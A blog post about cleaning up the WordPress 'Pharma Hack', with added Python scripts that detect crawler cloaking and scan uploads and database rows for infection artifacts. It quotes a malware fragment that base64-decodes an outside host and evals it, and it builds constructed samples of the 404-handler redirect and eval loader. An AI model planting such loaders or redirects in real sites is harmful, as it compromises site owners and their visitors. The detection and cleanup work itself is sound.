You May Already Be A Victim

A few weeks ago a client wrote to tell me that they thought their site had been hacked. It looked fine when you pulled it up in the browser, but when you searched for it on Google you got a warning that the site may have been compromised, and instead of the real title you saw something like “Adipose 25MG.”

With a little research I learned that it was in fact a well-known but little-understood exploit called the “Pharma Hack.” It’s devious in that it checks the user agent header and if it’s a search robot it serves one set of results — the hacked result; but if it’s a human user it renders the normal, clean code.

Try it yourself if you’re a WordPress user. Go to Google and use this search term:
site:www.myurl.com

“myurl” being of course your site’s URL. I cleaned out said client’s site twice, and checking again today it came up a third time. Curious, I checked my own Google results:

What the hack did was replace my title tag, and the top-level headline, with Buy VIAGRA Online… I am not amused at this point.
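Since the hack keys on the User-Agent header, the quickest check short of waiting for Google to re-crawl is to request your own front page once as a crawler and once as a browser and compare the title tag and the first headline. The script below is an added example, not code from the post or from any of the tools it mentions; the two sample pages at the bottom are constructed, and the live check is run by passing your own site's URL on the command line.

```python
import re
import sys
import urllib.request

# Two User-Agent strings: a stock browser and the public Googlebot string.
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
CRAWLER_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"


def _first_tag_text(html, tag):
    """Return the text of the first <tag>...</tag> with nested markup stripped."""
    m = re.search(rf"<{tag}\b[^>]*>(.*?)</{tag}\s*>", html, re.IGNORECASE | re.DOTALL)
    if not m:
        return ""
    text = re.sub(r"<[^>]+>", "", m.group(1))
    return re.sub(r"\s+", " ", text).strip()


def summarize(html):
    """The two things the post saw replaced: the title tag and the top headline."""
    return {"title": _first_tag_text(html, "title"), "h1": _first_tag_text(html, "h1")}


def compare_views(crawler_html, browser_html):
    """Report whether the crawler view differs from the browser view."""
    crawler, browser = summarize(crawler_html), summarize(browser_html)
    diffs = {k: (crawler[k], browser[k]) for k in crawler if crawler[k] != browser[k]}
    return {"cloaked": bool(diffs), "differences": diffs}


def fetch(url, user_agent, timeout=15):
    """Plain GET of one URL with the given User-Agent (network access needed)."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        return resp.read().decode(charset, errors="replace")


def check_site(url):
    """Fetch the page as a crawler and as a browser, then diff the two."""
    return compare_views(fetch(url, CRAWLER_UA), fetch(url, BROWSER_UA))


# Constructed sample responses standing in for the two fetches (not captured from a real site).
CLEAN_PAGE = ("<html><head><title>My Blog</title></head>"
              "<body><h1>My Blog</h1><p>Hello</p></body></html>")
CLOAKED_PAGE = ('<html><head><title>Buy VIAGRA Online</title></head>'
                '<body><h1><a href="#">Buy VIAGRA Online</a></h1><p>Hello</p></body></html>')

if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(check_site(sys.argv[1]))   # python cloak_check.py https://www.myurl.com/
    else:
        print(compare_views(CLOAKED_PAGE, CLEAN_PAGE))
```

Run it against a few pages, not only the front page, and bear in mind that a difference is evidence worth looking into rather than proof: a page that rotates its headline for every request will also show a difference, and a variant that keys on the client's IP address instead of the User-Agent will not show one at all.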

A couple of tools you’ll want

First of all, sign up for Google’s Webmaster Tools. It’s an excellent way to find out first-hand if you’ve been compromised. Register your sites and check in periodically. There’s obviously lots of other goodies there too.

There are a couple of fine tutorials on how to fix this. You’re going to need file system access, including access to hidden files, on your server. If you can search for files, all the better. If you can get shell access and grep, better still. Otherwise you’ve got some tedious directory-by-directory searching ahead of you. Don’t skimp on this or you’ll simply get hacked again in a few days or weeks. You’ll also need access to the database, either through the command line or through something like phpmyadmin. Most hosting services provide the latter.

Sucuri’s is the most complete. Chris Pearson’s is also good, and quite readable.

The thing is, the malicious files can be anywhere. I found one in my Akismet plug-in directory, the irony of which does not escape me. I found one in another plug-in directory on my client’s. Even after uninstalling and re-installing all the plugins, they kept coming back.

Note especially the sections on database entries. That’s what allows it to keep popping up again and again. Basically, there are long base64-encoded strings put into field values backwards.

After installing and running the WP-MalWatch plugin I found lots more. (note to the developer: a module that looks for database entries would be cool). All through my uploads directory, and especially in the 2006 and 2007 directories where I’m least likely to look (it’s a recent infection after all, it couldn’t have been way back then!) were a whole bunch of .htaccess and .php files. None of them should be in the uploads directory, period. The .htaccess files consisted of a few lines of 404 redirect code; this is perhaps what triggers the whole thing. When a user looks for an image or other upload that isn’t there, the 404 redirects the user to a “custom” error handler — one of the bogus .php files — and runs it.

Insidious. The .php files are randomly named, 42983.php or 23001.php, and there were dozens of them, usually coming in pairs. Once I teased one out and started to look at it, this is what I found: a lot of environment variables were strung together into a string. Then there’s this:
base64_decode("aHR0cDovLw==") . base64_decode("d3d3My5yc3NuZXdzLndz")

When you base64_decode that you get “http://www3.rssnews.ws”. This is strung together with the long string it made out of the environment, and put into an eval block:

http://www3.rssnews.ws/?$yourServerInformationHere

There’s a second base64-encoded string that works out to “http://www3.xmldata.info”. These are the guys wearing the black hats.
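The three artifacts described above, stray .htaccess and .php files under uploads, base64 literals fed to eval, and base64 strings stored backwards in the database, are all mechanical enough to look for with a script rather than directory by directory. The scanner below is an added example, not code from the post, from WP-MalWatch, or from the Sucuri or Pearson tutorials. The sample uploads tree, the sample PHP and the option rows it scans are constructed for illustration; the option names are placeholders and not the ones a real infection uses. Feed scan_options the rows from a query such as SELECT option_name, option_value FROM wp_options, and point scan_uploads at your real wp-content/uploads directory.

```python
import base64
import os
import re
import tempfile

# Patterns for the artifacts described in the post: eval()/base64_decode() in stray
# PHP files, and a 404 handler in an .htaccess that hands requests to one of them.
SUSPICIOUS_CODE = re.compile(r"\b(?:eval|base64_decode)\s*\(", re.IGNORECASE)
ERRORDOC_404 = re.compile(r"^\s*ErrorDocument\s+404\s+(\S+)", re.IGNORECASE | re.MULTILINE)
B64_LITERAL = re.compile(r'base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')


def read_text(path):
    with open(path, encoding="utf-8", errors="replace") as fh:
        return fh.read()


def decode_base64_literals(php_source):
    """Decode every base64_decode("...") literal, as the post did by hand."""
    out = []
    for lit in B64_LITERAL.findall(php_source):
        try:
            out.append(base64.b64decode(lit, validate=True).decode("utf-8", "replace"))
        except ValueError:          # binascii.Error is a ValueError
            out.append(None)
    return out


def scan_uploads(uploads_dir):
    """Return (path, reason) for every .htaccess or PHP file under the uploads tree."""
    findings = []
    for root, _dirs, files in os.walk(uploads_dir):
        for name in sorted(files):
            path, low = os.path.join(root, name), name.lower()
            if low == ".htaccess":
                m = ERRORDOC_404.search(read_text(path))
                reason = f"404 handler points at {m.group(1)}" if m else ".htaccess inside uploads"
                findings.append((path, reason))
            elif low.endswith((".php", ".php5", ".phtml")):
                reason = "PHP file inside uploads"
                if SUSPICIOUS_CODE.search(read_text(path)):
                    reason += ", uses eval/base64_decode"
                findings.append((path, reason))
    return findings


def decode_reversed_base64(value):
    """Undo the 'stored backwards' trick: reverse, then base64-decode.
    Returns the decoded text, or None when the value is not reversed base64."""
    try:
        return base64.b64decode(value[::-1], validate=True).decode("utf-8", "replace")
    except ValueError:
        return None


def scan_options(rows):
    """rows: (option_name, option_value) pairs. Flags values that, once reversed and
    decoded, contain PHP, an eval, or a URL."""
    findings = []
    for name, value in rows:
        decoded = decode_reversed_base64(value)
        if decoded and re.search(r"<\?php|eval\s*\(|base64_decode|https?://", decoded, re.IGNORECASE):
            findings.append((name, decoded[:60]))
    return findings


# --- constructed sample data (not real infection artifacts) ---
SAMPLE_PHP = 'eval(base64_decode("aHR0cDovLw==") . base64_decode("d3d3My5yc3NuZXdzLndz"));'


def reversed_b64(text):
    """Encode text the way the post says the DB values are stored: base64, backwards."""
    return base64.b64encode(text.encode()).decode()[::-1]


SAMPLE_OPTIONS = [
    ("blogname", "My Blog"),                                   # legitimate, must not be flagged
    ("opt_constructed_1", reversed_b64('<?php eval(base64_decode("aHR0cDovLw=="));')),
    ("opt_constructed_2", reversed_b64("http://www3.xmldata.info/")),
]


def build_sample_uploads(base_dir):
    """Create a constructed uploads/2006/03 tree with the three kinds of file in question."""
    year_dir = os.path.join(base_dir, "2006", "03")
    os.makedirs(year_dir)
    with open(os.path.join(year_dir, ".htaccess"), "w") as fh:
        fh.write("ErrorDocument 404 /wp-content/uploads/2006/03/42983.php\n")
    with open(os.path.join(year_dir, "42983.php"), "w") as fh:
        fh.write("<?php " + SAMPLE_PHP)
    with open(os.path.join(year_dir, "photo.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff")   # harmless image header; must not be flagged
    return year_dir


def demo_scan():
    """Build the constructed tree in a temp dir, scan it, return (basename, reason) pairs."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_uploads(tmp)
        return [(os.path.basename(p), r) for p, r in scan_uploads(tmp)]


if __name__ == "__main__":
    for name, reason in demo_scan():
        print(name, "->", reason)
    for name, snippet in scan_options(SAMPLE_OPTIONS):
        print(name, "->", snippet)
    print(decode_base64_literals(SAMPLE_PHP))   # ['http://', 'www3.rssnews.ws']
```

Every hit from scan_uploads deserves a look, since nothing that executes belongs under uploads at all; the eval/base64 flag and the 404-handler flag only tell you which hits to open first. The option scan is deliberately strict (validate=True), so ordinary values that merely happen to contain base64 are not reported, and anything it does report is worth exporting before you delete it, so that a second cleanup can be compared against the first.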

Now with the plugin installed at least I feel like I’ve got a leg up on the matter; I can run a scan daily, or just check my dashboard, and see what’s going on. If you’re running WordPress, run don’t walk to Google and make sure you haven’t been hit.

Summing Up

Get Google Webmaster Tools. Check your site on Google to make sure your page’s title is what it should be. Clean out the file system of alien files. Clean out the database entries that shouldn’t be there. Install and run the security plugin.

What’s bad here is that nobody knows how this happens, what the vulnerability is. Until then, vigilance is all you’ve got.
